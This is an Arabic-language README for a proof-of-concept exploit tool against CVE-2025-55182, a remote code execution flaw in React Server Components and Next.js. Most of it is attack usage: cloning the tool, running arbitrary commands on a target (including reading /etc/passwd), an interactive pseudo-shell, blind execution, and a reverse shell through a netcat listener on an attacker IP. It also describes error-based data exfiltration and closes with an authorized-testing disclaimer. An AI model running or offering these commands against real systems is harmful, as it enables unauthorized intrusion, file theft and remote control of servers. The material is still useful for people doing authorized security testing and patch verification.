
CVE-2025-55182 React2Shell PoC - ثغرة RCE حرجة في React Server Components / Next.js. درجة CVSS 10.0. استخراج بيانات قائم على الأخطاء، شل عكسي، وضع تفاعلي.
إثبات المفهوم لـ CVE-2025-55182، وهي ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد بدون مصادقة في React Server Components.
درجة CVSS: 10.0 (حرجة)
توجد الثغرة في مفكك تسلسل بروتوكول Flight في React. من خلال استغلال تلوث النموذج الأولي عبر حمولات مصممة خصيصًا، يمكن للمهاجم تحقيق تنفيذ تعليمات برمجية عشوائية على تطبيقات Next.js المعرضة للخطر.
| المنتج | المتأثر | المُصحح |
|---|---|---|
| React | 19.0.0 - 19.2.0 | 19.0.1, 19.1.2, 19.2.1+ |
| Next.js | 14.3.0-canary.77 - 16.x | 15.0.5, 15.1.9, 15.2.6, 16.0.7+ |
git clone https://github.com/p3ta00/react2shell-poc.git
cd react2shell-poc
pip install requests
يُعاد الإخراج مباشرة في استجابة HTTP عبر خطأ NEXT_REDIRECT - لا حاجة لخادم رد اتصال.
python3 react2shell-poc.py -t http://TARGET:3000 -c "id"
python3 react2shell-poc.py -t http://TARGET:3000 -c "cat /etc/passwd"
python3 react2shell-poc.py -t http://TARGET:3000 -i
python3 react2shell-poc.py -t http://TARGET:3000 --check
python3 react2shell-poc.py -t http://TARGET:3000 -c "touch /tmp/pwned" --blind
# ابدأ المستمع
nc -lvnp 4444
# أرسل الحمولة
python3 react2shell-poc.py -t http://TARGET:3000 --revshell --lhost YOUR_IP --lport 4444
python3 react2shell-poc.py -t http://TARGET:3000 -c "id" --listen --lhost YOUR_IP
-t, --target Target URL (required)
-c, --command Command to execute (output via error-based exfil by default)
--check Check if target is vulnerable
--blind Blind RCE mode (no output capture)
--listen Use callback server instead of error-based exfil
-i, --interactive Interactive pseudo-shell mode
--revshell Attempt reverse shell
--lhost Attacker IP for callbacks/reverse shell
--lport Callback port (default: 9999)
--callback Manual callback URL
--timeout Request timeout in seconds (default: 30)
تستخدم طريقة الاستخراج الافتراضية حقن خطأ NEXT_REDIRECT:
NEXT_REDIRECT مع الإخراج في حقل digestهذا أكثر موثوقية من الاستخراج القائم على رد الاتصال لأنه لا يتطلب وصولاً شبكيًا صادرًا من الهدف.
هذه الأداة لأغراض اختبار الأمان المصرح به والتعليم فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. احصل دائمًا على إذن مناسب قبل الاختبار.
p3ta